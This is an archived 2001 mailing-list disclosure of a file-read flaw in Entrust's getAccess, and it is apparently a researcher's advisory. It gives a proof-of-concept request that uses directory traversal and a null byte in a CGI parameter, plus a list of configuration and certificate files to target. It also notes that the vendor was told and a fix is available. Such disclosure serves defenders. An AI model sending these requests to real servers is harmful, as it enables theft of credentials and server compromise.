New getAccess[tm] Vulnerability

From: rudi carell (rudicarellat_private)
Date: Mon Nov 05 2001 - 14:17:14 PST

Next message: Eric Skinner: "Entrust Bulletin E01-005: GetAccess Access Service vulnerability"

Previous message: Aiden ORawe: "RH Linux Tux HTTPD DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Good Morning Listmembers,

this is another posting(see 1st here http://www.securityfocus.com/bid/3109)
about Entrust s "getAccess[tm]" product


Problem Description:

"getAccess[tm]" (still) uses default shellscripts which start java-classes
for their web-applications.

due to missing input-validation it is possible to read files with getAccess
s permissions on the "getaccess"-machine. (only works in combination with
other input fields as described below)
in connection with config- and other files this can lead to a
total server-compromise(dont ask me how:-).

POC-Example:

a HTTP-request to:
http://getAccessHostname/sek-bin/helpwin.gas.bat?

with the following parameters:
mode=
&draw=x
&file=x
&module=
&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
&chapter=

... will lead to disclosure of [FILE/PATH]

Config-Filelist(depends heavily on config .. and can be found 2 trav s back
[../../]):

/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs


Summary:

object: (helpwin.gas.bat  cgi-shell-scripts)

class: Reffering to OWASP-IV (Input Validation Classes)

Directory Traversal (IV-DT-1)
http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
Null Character (IV-NC-1)
http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
Meta Character (IV-MC-1)
http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm

remote: yes
local: ---

vendor: hast been informed with seperate e-mail
(securityat_private/entrustat_private)

patch/fix: is already availiable and will be posted by entrust here today.

recomannded fix: sanitize meta-characters from user-input

personal remark: using shell-scripts for security-related software has
always been dangerous!!!


nice day,

rC




securityat_private
rudicarellat_private
http://www.freefly.com/security/

check out the brandnew Open Web Application Security project
http://www.owasp.org



































_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

Next message: Eric Skinner: "Entrust Bulletin E01-005: GetAccess Access Service vulnerability"
Previous message: Aiden ORawe: "RH Linux Tux HTTPD DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Nov 05 2001 - 09:55:31 PST